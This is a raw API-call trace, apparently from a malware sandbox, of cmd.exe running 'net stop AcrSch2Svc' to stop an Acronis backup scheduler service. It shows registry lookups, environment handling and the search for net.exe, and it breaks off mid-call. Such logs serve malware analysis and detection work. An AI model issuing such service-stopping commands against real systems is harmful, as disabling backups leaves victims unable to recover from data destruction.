(_FileHandle=1) returned 0x7 [0069.575] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x0) returned 1 [0069.576] _get_osfhandle (_FileHandle=1) returned 0x7 [0069.576] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x49f041ac | out: lpMode=0x49f041ac) returned 1 [0069.576] _get_osfhandle (_FileHandle=1) returned 0x7 [0069.576] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1 [0069.576] _get_osfhandle (_FileHandle=0) returned 0x3 [0069.576] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x49f041b0 | out: lpMode=0x49f041b0) returned 1 [0069.576] _get_osfhandle (_FileHandle=0) returned 0x3 [0069.577] SetConsoleMode (hConsoleHandle=0x3, dwMode=0x1a7) returned 1 [0069.577] GetEnvironmentStringsW () returned 0x722030* [0069.577] GetProcessHeap () returned 0x710000 [0069.577] RtlAllocateHeap (HeapHandle=0x710000, Flags=0x8, Size=0xaca) returned 0x722b08 [0069.577] FreeEnvironmentStringsW (penv=0x722030) returned 1 [0069.577] GetProcessHeap () returned 0x710000 [0069.577] RtlAllocateHeap (HeapHandle=0x710000, Flags=0x8, Size=0x4) returned 0x720c60 [0069.577] GetEnvironmentStringsW () returned 0x722030* [0069.577] GetProcessHeap () returned 0x710000 [0069.577] RtlAllocateHeap (HeapHandle=0x710000, Flags=0x8, Size=0xaca) returned 0x7235e0 [0069.577] FreeEnvironmentStringsW (penv=0x722030) returned 1 [0069.577] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x32e750 | out: phkResult=0x32e750*=0x68) returned 0x0 [0069.578] RegQueryValueExW (in: hKey=0x68, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x32e758, lpData=0x32e75c, lpcbData=0x32e754*=0x1000 | out: lpType=0x32e758*=0x0, lpData=0x32e75c*=0x0, lpcbData=0x32e754*=0x1000) returned 0x2 [0069.578] RegQueryValueExW (in: hKey=0x68, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x32e758, lpData=0x32e75c, lpcbData=0x32e754*=0x1000 | out: lpType=0x32e758*=0x4, lpData=0x32e75c*=0x1, lpcbData=0x32e754*=0x4) returned 0x0 [0069.578] RegQueryValueExW (in: hKey=0x68, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x32e758, lpData=0x32e75c, lpcbData=0x32e754*=0x1000 | out: lpType=0x32e758*=0x0, lpData=0x32e75c*=0x1, lpcbData=0x32e754*=0x1000) returned 0x2 [0069.578] RegQueryValueExW (in: hKey=0x68, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x32e758, lpData=0x32e75c, lpcbData=0x32e754*=0x1000 | out: lpType=0x32e758*=0x4, lpData=0x32e75c*=0x0, lpcbData=0x32e754*=0x4) returned 0x0 [0069.578] RegQueryValueExW (in: hKey=0x68, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x32e758, lpData=0x32e75c, lpcbData=0x32e754*=0x1000 | out: lpType=0x32e758*=0x4, lpData=0x32e75c*=0x40, lpcbData=0x32e754*=0x4) returned 0x0 [0069.578] RegQueryValueExW (in: hKey=0x68, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x32e758, lpData=0x32e75c, lpcbData=0x32e754*=0x1000 | out: lpType=0x32e758*=0x4, lpData=0x32e75c*=0x40, lpcbData=0x32e754*=0x4) returned 0x0 [0069.578] RegQueryValueExW (in: hKey=0x68, lpValueName="AutoRun", lpReserved=0x0, lpType=0x32e758, lpData=0x32e75c, lpcbData=0x32e754*=0x1000 | out: lpType=0x32e758*=0x0, lpData=0x32e75c*=0x40, lpcbData=0x32e754*=0x1000) returned 0x2 [0069.578] RegCloseKey (hKey=0x68) returned 0x0 [0069.578] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x32e750 | out: phkResult=0x32e750*=0x68) returned 0x0 [0069.578] RegQueryValueExW (in: hKey=0x68, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x32e758, lpData=0x32e75c, lpcbData=0x32e754*=0x1000 | out: lpType=0x32e758*=0x0, lpData=0x32e75c*=0x40, lpcbData=0x32e754*=0x1000) returned 0x2 [0069.578] RegQueryValueExW (in: hKey=0x68, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x32e758, lpData=0x32e75c, lpcbData=0x32e754*=0x1000 | out: lpType=0x32e758*=0x4, lpData=0x32e75c*=0x1, lpcbData=0x32e754*=0x4) returned 0x0 [0069.578] RegQueryValueExW (in: hKey=0x68, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x32e758, lpData=0x32e75c, lpcbData=0x32e754*=0x1000 | out: lpType=0x32e758*=0x0, lpData=0x32e75c*=0x1, lpcbData=0x32e754*=0x1000) returned 0x2 [0069.578] RegQueryValueExW (in: hKey=0x68, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x32e758, lpData=0x32e75c, lpcbData=0x32e754*=0x1000 | out: lpType=0x32e758*=0x4, lpData=0x32e75c*=0x0, lpcbData=0x32e754*=0x4) returned 0x0 [0069.578] RegQueryValueExW (in: hKey=0x68, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x32e758, lpData=0x32e75c, lpcbData=0x32e754*=0x1000 | out: lpType=0x32e758*=0x4, lpData=0x32e75c*=0x9, lpcbData=0x32e754*=0x4) returned 0x0 [0069.578] RegQueryValueExW (in: hKey=0x68, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x32e758, lpData=0x32e75c, lpcbData=0x32e754*=0x1000 | out: lpType=0x32e758*=0x4, lpData=0x32e75c*=0x9, lpcbData=0x32e754*=0x4) returned 0x0 [0069.578] RegQueryValueExW (in: hKey=0x68, lpValueName="AutoRun", lpReserved=0x0, lpType=0x32e758, lpData=0x32e75c, lpcbData=0x32e754*=0x1000 | out: lpType=0x32e758*=0x0, lpData=0x32e75c*=0x9, lpcbData=0x32e754*=0x1000) returned 0x2 [0069.578] RegCloseKey (hKey=0x68) returned 0x0 [0069.578] time (in: timer=0x0 | out: timer=0x0) returned 0x5d97ebb4 [0069.578] srand (_Seed=0x5d97ebb4) [0069.578] GetCommandLineW () returned="\"C:\\Windows\\System32\\cmd.exe\" /c net stop AcrSch2Svc" [0069.578] GetCommandLineW () returned="\"C:\\Windows\\System32\\cmd.exe\" /c net stop AcrSch2Svc" [0069.579] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x49f05260 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned 0x25 [0069.579] GetProcessHeap () returned 0x710000 [0069.579] RtlAllocateHeap (HeapHandle=0x710000, Flags=0x8, Size=0x210) returned 0x722030 [0069.579] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x722038, nSize=0x104 | out: lpFilename="C:\\Windows\\SysWOW64\\cmd.exe" (normalized: "c:\\windows\\syswow64\\cmd.exe")) returned 0x1b [0069.579] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x49f10640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x63 [0069.579] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x49f10640, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0069.579] GetEnvironmentVariableW (in: lpName="PROMPT", lpBuffer=0x49f10640, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0069.579] _wcsicmp (_String1="PROMPT", _String2="CD") returned 13 [0069.579] _wcsicmp (_String1="PROMPT", _String2="ERRORLEVEL") returned 11 [0069.579] _wcsicmp (_String1="PROMPT", _String2="CMDEXTVERSION") returned 13 [0069.579] _wcsicmp (_String1="PROMPT", _String2="CMDCMDLINE") returned 13 [0069.579] _wcsicmp (_String1="PROMPT", _String2="DATE") returned 12 [0069.579] _wcsicmp (_String1="PROMPT", _String2="TIME") returned -4 [0069.579] _wcsicmp (_String1="PROMPT", _String2="RANDOM") returned -2 [0069.579] _wcsicmp (_String1="PROMPT", _String2="HIGHESTNUMANODENUMBER") returned 8 [0069.579] SetEnvironmentVariableW (lpName="PROMPT", lpValue="$P$G") returned 1 [0069.579] GetProcessHeap () returned 0x710000 [0069.579] HeapFree (in: hHeap=0x710000, dwFlags=0x0, lpMem=0x722b08 | out: hHeap=0x710000) returned 1 [0069.580] GetEnvironmentStringsW () returned 0x722248* [0069.580] GetProcessHeap () returned 0x710000 [0069.580] RtlAllocateHeap (HeapHandle=0x710000, Flags=0x8, Size=0xae2) returned 0x724ba8 [0069.580] FreeEnvironmentStringsW (penv=0x722248) returned 1 [0069.580] GetEnvironmentVariableW (in: lpName="COMSPEC", lpBuffer=0x49f10640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0069.580] GetEnvironmentVariableW (in: lpName="KEYS", lpBuffer=0x49f10640, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0069.580] _wcsicmp (_String1="KEYS", _String2="CD") returned 8 [0069.580] _wcsicmp (_String1="KEYS", _String2="ERRORLEVEL") returned 6 [0069.580] _wcsicmp (_String1="KEYS", _String2="CMDEXTVERSION") returned 8 [0069.580] _wcsicmp (_String1="KEYS", _String2="CMDCMDLINE") returned 8 [0069.580] _wcsicmp (_String1="KEYS", _String2="DATE") returned 7 [0069.580] _wcsicmp (_String1="KEYS", _String2="TIME") returned -9 [0069.580] _wcsicmp (_String1="KEYS", _String2="RANDOM") returned -7 [0069.580] _wcsicmp (_String1="KEYS", _String2="HIGHESTNUMANODENUMBER") returned 3 [0069.580] GetProcessHeap () returned 0x710000 [0069.580] RtlAllocateHeap (HeapHandle=0x710000, Flags=0x8, Size=0x54) returned 0x725698 [0069.580] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x32f51c | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned 0x25 [0069.580] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop", nBufferLength=0x104, lpBuffer=0x32f51c, lpFilePart=0x32f518 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop", lpFilePart=0x32f518*="Desktop") returned 0x25 [0069.580] GetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop")) returned 0x11 [0069.580] FindFirstFileW (in: lpFileName="C:\\Users", lpFindFileData=0x32f298 | out: lpFindFileData=0x32f298*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xfda01e06, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x28c670c0, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x28c670c0, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Users", cAlternateFileName="")) returned 0x721eb0 [0069.580] FindClose (in: hFindFile=0x721eb0 | out: hFindFile=0x721eb0) returned 1 [0069.581] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz", lpFindFileData=0x32f298 | out: lpFindFileData=0x32f298*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x28c670c0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x963e2b90, ftLastAccessTime.dwHighDateTime=0x1d57b18, ftLastWriteTime.dwLowDateTime=0x963e2b90, ftLastWriteTime.dwHighDateTime=0x1d57b18, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="5p5NrGJn0jS HALPmcxz", cAlternateFileName="5P5NRG~1")) returned 0x721eb0 [0069.581] FindClose (in: hFindFile=0x721eb0 | out: hFindFile=0x721eb0) returned 1 [0069.581] _wcsnicmp (_String1="5P5NRG~1", _String2="5p5NrGJn0jS HALPmcxz", _MaxCount=0x14) returned 20 [0069.581] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop", lpFindFileData=0x32f298 | out: lpFindFileData=0x32f298*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x7e416480, ftLastAccessTime.dwHighDateTime=0x1d57b18, ftLastWriteTime.dwLowDateTime=0x7e416480, ftLastWriteTime.dwHighDateTime=0x1d57b18, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Desktop", cAlternateFileName="")) returned 0x721eb0 [0069.581] FindClose (in: hFindFile=0x721eb0 | out: hFindFile=0x721eb0) returned 1 [0069.581] GetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop")) returned 0x11 [0069.581] SetCurrentDirectoryW (lpPathName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop")) returned 1 [0069.581] SetEnvironmentVariableW (lpName="=C:", lpValue="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned 1 [0069.581] GetProcessHeap () returned 0x710000 [0069.581] HeapFree (in: hHeap=0x710000, dwFlags=0x0, lpMem=0x724ba8 | out: hHeap=0x710000) returned 1 [0069.581] GetEnvironmentStringsW () returned 0x7240b8* [0069.581] GetProcessHeap () returned 0x710000 [0069.581] RtlAllocateHeap (HeapHandle=0x710000, Flags=0x8, Size=0xb36) returned 0x725ef8 [0069.581] FreeEnvironmentStringsW (penv=0x7240b8) returned 1 [0069.581] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x49f05260 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned 0x25 [0069.582] GetProcessHeap () returned 0x710000 [0069.582] HeapFree (in: hHeap=0x710000, dwFlags=0x0, lpMem=0x725698 | out: hHeap=0x710000) returned 1 [0069.582] GetProcessHeap () returned 0x710000 [0069.582] RtlAllocateHeap (HeapHandle=0x710000, Flags=0x8, Size=0x400e) returned 0x726a38 [0069.582] GetProcessHeap () returned 0x710000 [0069.582] RtlAllocateHeap (HeapHandle=0x710000, Flags=0x8, Size=0x34) returned 0x721eb0 [0069.582] GetProcessHeap () returned 0x710000 [0069.582] HeapFree (in: hHeap=0x710000, dwFlags=0x0, lpMem=0x726a38 | out: hHeap=0x710000) returned 1 [0069.582] GetConsoleOutputCP () returned 0x1b5 [0069.582] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x49f04260 | out: lpCPInfo=0x49f04260) returned 1 [0069.582] GetUserDefaultLCID () returned 0x409 [0069.583] GetLocaleInfoW (in: Locale=0x409, LCType=0x1e, lpLCData=0x49f04950, cchData=8 | out: lpLCData=":") returned 2 [0069.583] GetLocaleInfoW (in: Locale=0x409, LCType=0x23, lpLCData=0x32f65c, cchData=128 | out: lpLCData="0") returned 2 [0069.583] GetLocaleInfoW (in: Locale=0x409, LCType=0x21, lpLCData=0x32f65c, cchData=128 | out: lpLCData="0") returned 2 [0069.583] GetLocaleInfoW (in: Locale=0x409, LCType=0x24, lpLCData=0x32f65c, cchData=128 | out: lpLCData="1") returned 2 [0069.583] GetLocaleInfoW (in: Locale=0x409, LCType=0x1d, lpLCData=0x49f04940, cchData=8 | out: lpLCData="/") returned 2 [0069.583] GetLocaleInfoW (in: Locale=0x409, LCType=0x31, lpLCData=0x49f04d80, cchData=32 | out: lpLCData="Mon") returned 4 [0069.584] GetLocaleInfoW (in: Locale=0x409, LCType=0x32, lpLCData=0x49f04d40, cchData=32 | out: lpLCData="Tue") returned 4 [0069.584] GetLocaleInfoW (in: Locale=0x409, LCType=0x33, lpLCData=0x49f04d00, cchData=32 | out: lpLCData="Wed") returned 4 [0069.584] GetLocaleInfoW (in: Locale=0x409, LCType=0x34, lpLCData=0x49f04cc0, cchData=32 | out: lpLCData="Thu") returned 4 [0069.584] GetLocaleInfoW (in: Locale=0x409, LCType=0x35, lpLCData=0x49f04c80, cchData=32 | out: lpLCData="Fri") returned 4 [0069.584] GetLocaleInfoW (in: Locale=0x409, LCType=0x36, lpLCData=0x49f04c40, cchData=32 | out: lpLCData="Sat") returned 4 [0069.584] GetLocaleInfoW (in: Locale=0x409, LCType=0x37, lpLCData=0x49f04c00, cchData=32 | out: lpLCData="Sun") returned 4 [0069.584] GetLocaleInfoW (in: Locale=0x409, LCType=0xe, lpLCData=0x49f04930, cchData=8 | out: lpLCData=".") returned 2 [0069.584] GetLocaleInfoW (in: Locale=0x409, LCType=0xf, lpLCData=0x49f04920, cchData=8 | out: lpLCData=",") returned 2 [0069.584] setlocale (category=0, locale=".OCP") returned="English_United States.437" [0069.585] GetProcessHeap () returned 0x710000 [0069.585] RtlAllocateHeap (HeapHandle=0x710000, Flags=0x0, Size=0x20c) returned 0x722dc0 [0069.585] GetConsoleTitleW (in: lpConsoleTitle=0x722dc0, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\System32\\cmd.exe") returned 0x1b [0069.585] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76c20000 [0069.585] GetProcAddress (hModule=0x76c20000, lpProcName="CopyFileExW") returned 0x76c53b92 [0069.585] GetProcAddress (hModule=0x76c20000, lpProcName="IsDebuggerPresent") returned 0x76c34a5d [0069.585] GetProcAddress (hModule=0x76c20000, lpProcName="SetConsoleInputExeNameW") returned 0x76c4a79d [0069.586] GetProcessHeap () returned 0x710000 [0069.586] RtlAllocateHeap (HeapHandle=0x710000, Flags=0x8, Size=0x400a) returned 0x726a38 [0069.586] GetProcessHeap () returned 0x710000 [0069.586] HeapFree (in: hHeap=0x710000, dwFlags=0x0, lpMem=0x726a38 | out: hHeap=0x710000) returned 1 [0069.586] _wcsicmp (_String1="net", _String2=")") returned 69 [0069.586] _wcsicmp (_String1="FOR", _String2="net") returned -8 [0069.586] _wcsicmp (_String1="FOR/?", _String2="net") returned -8 [0069.586] _wcsicmp (_String1="IF", _String2="net") returned -5 [0069.586] _wcsicmp (_String1="IF/?", _String2="net") returned -5 [0069.586] _wcsicmp (_String1="REM", _String2="net") returned 4 [0069.586] _wcsicmp (_String1="REM/?", _String2="net") returned 4 [0069.586] GetProcessHeap () returned 0x710000 [0069.586] RtlAllocateHeap (HeapHandle=0x710000, Flags=0x8, Size=0x58) returned 0x722fd8 [0069.586] GetProcessHeap () returned 0x710000 [0069.586] RtlAllocateHeap (HeapHandle=0x710000, Flags=0x8, Size=0x10) returned 0x71ff00 [0069.587] GetProcessHeap () returned 0x710000 [0069.587] RtlAllocateHeap (HeapHandle=0x710000, Flags=0x8, Size=0x2a) returned 0x723038 [0069.588] GetConsoleTitleW (in: lpConsoleTitle=0x32f354, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\System32\\cmd.exe") returned 0x1b [0069.588] _wcsicmp (_String1="net", _String2="DIR") returned 10 [0069.588] _wcsicmp (_String1="net", _String2="ERASE") returned 9 [0069.588] _wcsicmp (_String1="net", _String2="DEL") returned 10 [0069.588] _wcsicmp (_String1="net", _String2="TYPE") returned -6 [0069.588] _wcsicmp (_String1="net", _String2="COPY") returned 11 [0069.588] _wcsicmp (_String1="net", _String2="CD") returned 11 [0069.588] _wcsicmp (_String1="net", _String2="CHDIR") returned 11 [0069.588] _wcsicmp (_String1="net", _String2="RENAME") returned -4 [0069.588] _wcsicmp (_String1="net", _String2="REN") returned -4 [0069.588] _wcsicmp (_String1="net", _String2="ECHO") returned 9 [0069.588] _wcsicmp (_String1="net", _String2="SET") returned -5 [0069.588] _wcsicmp (_String1="net", _String2="PAUSE") returned -2 [0069.588] _wcsicmp (_String1="net", _String2="DATE") returned 10 [0069.588] _wcsicmp (_String1="net", _String2="TIME") returned -6 [0069.588] _wcsicmp (_String1="net", _String2="PROMPT") returned -2 [0069.588] _wcsicmp (_String1="net", _String2="MD") returned 1 [0069.588] _wcsicmp (_String1="net", _String2="MKDIR") returned 1 [0069.588] _wcsicmp (_String1="net", _String2="RD") returned -4 [0069.588] _wcsicmp (_String1="net", _String2="RMDIR") returned -4 [0069.589] _wcsicmp (_String1="net", _String2="PATH") returned -2 [0069.589] _wcsicmp (_String1="net", _String2="GOTO") returned 7 [0069.589] _wcsicmp (_String1="net", _String2="SHIFT") returned -5 [0069.589] _wcsicmp (_String1="net", _String2="CLS") returned 11 [0069.589] _wcsicmp (_String1="net", _String2="CALL") returned 11 [0069.589] _wcsicmp (_String1="net", _String2="VERIFY") returned -8 [0069.589] _wcsicmp (_String1="net", _String2="VER") returned -8 [0069.589] _wcsicmp (_String1="net", _String2="VOL") returned -8 [0069.589] _wcsicmp (_String1="net", _String2="EXIT") returned 9 [0069.589] _wcsicmp (_String1="net", _String2="SETLOCAL") returned -5 [0069.589] _wcsicmp (_String1="net", _String2="ENDLOCAL") returned 9 [0069.589] _wcsicmp (_String1="net", _String2="TITLE") returned -6 [0069.589] _wcsicmp (_String1="net", _String2="START") returned -5 [0069.589] _wcsicmp (_String1="net", _String2="DPATH") returned 10 [0069.589] _wcsicmp (_String1="net", _String2="KEYS") returned 3 [0069.589] _wcsicmp (_String1="net", _String2="MOVE") returned 1 [0069.589] _wcsicmp (_String1="net", _String2="PUSHD") returned -2 [0069.589] _wcsicmp (_String1="net", _String2="POPD") returned -2 [0069.589] _wcsicmp (_String1="net", _String2="ASSOC") returned 13 [0069.589] _wcsicmp (_String1="net", _String2="FTYPE") returned 8 [0069.589] _wcsicmp (_String1="net", _String2="BREAK") returned 12 [0069.589] _wcsicmp (_String1="net", _String2="COLOR") returned 11 [0069.589] _wcsicmp (_String1="net", _String2="MKLINK") returned 1 [0069.589] _wcsicmp (_String1="net", _String2="DIR") returned 10 [0069.589] _wcsicmp (_String1="net", _String2="ERASE") returned 9 [0069.589] _wcsicmp (_String1="net", _String2="DEL") returned 10 [0069.589] _wcsicmp (_String1="net", _String2="TYPE") returned -6 [0069.589] _wcsicmp (_String1="net", _String2="COPY") returned 11 [0069.589] _wcsicmp (_String1="net", _String2="CD") returned 11 [0069.589] _wcsicmp (_String1="net", _String2="CHDIR") returned 11 [0069.589] _wcsicmp (_String1="net", _String2="RENAME") returned -4 [0069.589] _wcsicmp (_String1="net", _String2="REN") returned -4 [0069.589] _wcsicmp (_String1="net", _String2="ECHO") returned 9 [0069.589] _wcsicmp (_String1="net", _String2="SET") returned -5 [0069.589] _wcsicmp (_String1="net", _String2="PAUSE") returned -2 [0069.589] _wcsicmp (_String1="net", _String2="DATE") returned 10 [0069.589] _wcsicmp (_String1="net", _String2="TIME") returned -6 [0069.590] _wcsicmp (_String1="net", _String2="PROMPT") returned -2 [0069.590] _wcsicmp (_String1="net", _String2="MD") returned 1 [0069.590] _wcsicmp (_String1="net", _String2="MKDIR") returned 1 [0069.590] _wcsicmp (_String1="net", _String2="RD") returned -4 [0069.590] _wcsicmp (_String1="net", _String2="RMDIR") returned -4 [0069.590] _wcsicmp (_String1="net", _String2="PATH") returned -2 [0069.590] _wcsicmp (_String1="net", _String2="GOTO") returned 7 [0069.590] _wcsicmp (_String1="net", _String2="SHIFT") returned -5 [0069.590] _wcsicmp (_String1="net", _String2="CLS") returned 11 [0069.590] _wcsicmp (_String1="net", _String2="CALL") returned 11 [0069.590] _wcsicmp (_String1="net", _String2="VERIFY") returned -8 [0069.590] _wcsicmp (_String1="net", _String2="VER") returned -8 [0069.590] _wcsicmp (_String1="net", _String2="VOL") returned -8 [0069.590] _wcsicmp (_String1="net", _String2="EXIT") returned 9 [0069.590] _wcsicmp (_String1="net", _String2="SETLOCAL") returned -5 [0069.590] _wcsicmp (_String1="net", _String2="ENDLOCAL") returned 9 [0069.590] _wcsicmp (_String1="net", _String2="TITLE") returned -6 [0069.590] _wcsicmp (_String1="net", _String2="START") returned -5 [0069.590] _wcsicmp (_String1="net", _String2="DPATH") returned 10 [0069.590] _wcsicmp (_String1="net", _String2="KEYS") returned 3 [0069.590] _wcsicmp (_String1="net", _String2="MOVE") returned 1 [0069.590] _wcsicmp (_String1="net", _String2="PUSHD") returned -2 [0069.590] _wcsicmp (_String1="net", _String2="POPD") returned -2 [0069.590] _wcsicmp (_String1="net", _String2="ASSOC") returned 13 [0069.590] _wcsicmp (_String1="net", _String2="FTYPE") returned 8 [0069.590] _wcsicmp (_String1="net", _String2="BREAK") returned 12 [0069.590] _wcsicmp (_String1="net", _String2="COLOR") returned 11 [0069.590] _wcsicmp (_String1="net", _String2="MKLINK") returned 1 [0069.590] _wcsicmp (_String1="net", _String2="FOR") returned 8 [0069.590] _wcsicmp (_String1="net", _String2="IF") returned 5 [0069.590] _wcsicmp (_String1="net", _String2="REM") returned -4 [0069.590] GetProcessHeap () returned 0x710000 [0069.590] RtlAllocateHeap (HeapHandle=0x710000, Flags=0x8, Size=0x210) returned 0x723070 [0069.591] GetProcessHeap () returned 0x710000 [0069.591] RtlAllocateHeap (HeapHandle=0x710000, Flags=0x8, Size=0x32) returned 0x723288 [0069.591] _wcsnicmp (_String1="net", _String2="cmd ", _MaxCount=0x4) returned 11 [0069.591] GetProcessHeap () returned 0x710000 [0069.591] RtlAllocateHeap (HeapHandle=0x710000, Flags=0x8, Size=0x418) returned 0x7107f0 [0069.591] SetErrorMode (uMode=0x0) returned 0x0 [0069.591] SetErrorMode (uMode=0x1) returned 0x0 [0069.591] GetFullPathNameW (in: lpFileName=".", nBufferLength=0x208, lpBuffer=0x7107f8, lpFilePart=0x32ee74 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop", lpFilePart=0x32ee74*="Desktop") returned 0x25 [0069.591] SetErrorMode (uMode=0x0) returned 0x1 [0069.591] GetProcessHeap () returned 0x710000 [0069.591] RtlReAllocateHeap (Heap=0x710000, Flags=0x0, Ptr=0x7107f0, Size=0x5c) returned 0x7107f0 [0069.591] GetProcessHeap () returned 0x710000 [0069.591] RtlSizeHeap (HeapHandle=0x710000, Flags=0x0, MemoryPointer=0x7107f0) returned 0x5c [0069.591] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x49f10640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x63 [0069.591] NeedCurrentDirectoryForExePathW (ExeName=".") returned 1 [0069.591] GetProcessHeap () returned 0x710000 [0069.591] RtlAllocateHeap (HeapHandle=0x710000, Flags=0x8, Size=0x120) returned 0x7232c8 [0069.591] GetProcessHeap () returned 0x710000 [0069.591] RtlAllocateHeap (HeapHandle=0x710000, Flags=0x8, Size=0x238) returned 0x710858 [0069.597] GetProcessHeap () returned 0x710000 [0069.597] RtlReAllocateHeap (Heap=0x710000, Flags=0x0, Ptr=0x710858, Size=0x122) returned 0x710858 [0069.597] GetProcessHeap () returned 0x710000 [0069.597] RtlSizeHeap (HeapHandle=0x710000, Flags=0x0, MemoryPointer=0x710858) returned 0x122 [0069.597] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x49f10640, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0069.597] GetProcessHeap () returned 0x710000 [0069.597] RtlAllocateHeap (HeapHandle=0x710000, Flags=0x8, Size=0xe0) returned 0x7233f0 [0069.598] GetProcessHeap () returned 0x710000 [0069.598] RtlReAllocateHeap (Heap=0x710000, Flags=0x0, Ptr=0x7233f0, Size=0x76) returned 0x7233f0 [0069.598] GetProcessHeap () returned 0x710000 [0069.598] RtlSizeHeap (HeapHandle=0x710000, Flags=0x0, MemoryPointer=0x7233f0) returned 0x76 [0069.599] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0069.599] FindFirstFileExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\net.*", fInfoLevelId=0x1, lpFindFileData=0x32ebf0, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x32ebf0) returned 0xffffffff [0069.599] GetLastError () returned 0x2 [0069.599] FindFirstFileExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\net", fInfoLevelId=0x1, lpFindFileData=0x32ebf0, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x32ebf0) returned 0xffffffff [0069.599] GetLastError () returned 0x2 [0069.599] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0069.599] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\net.*", fInfoLevelId=0x1, lpFindFileData=0x32ebf0, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x32ebf0) returned 0x723470 [0069.599] GetProcessHeap () returned 0x710000 [0069.599] RtlAllocateHeap (HeapHandle=0x710000, Flags=0x0, Size=0x14) returned 0x7234b0 [0069.599] FindClose (in: hFindFile=0x723470 | out: hFindFile=0x723470) returned 1 [0069.599] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\net.COM", fInfoLevelId=0x1, lpFindFileData=0x32ebf0, fSearchOp=0x0, lpSearchFilter=0x0, 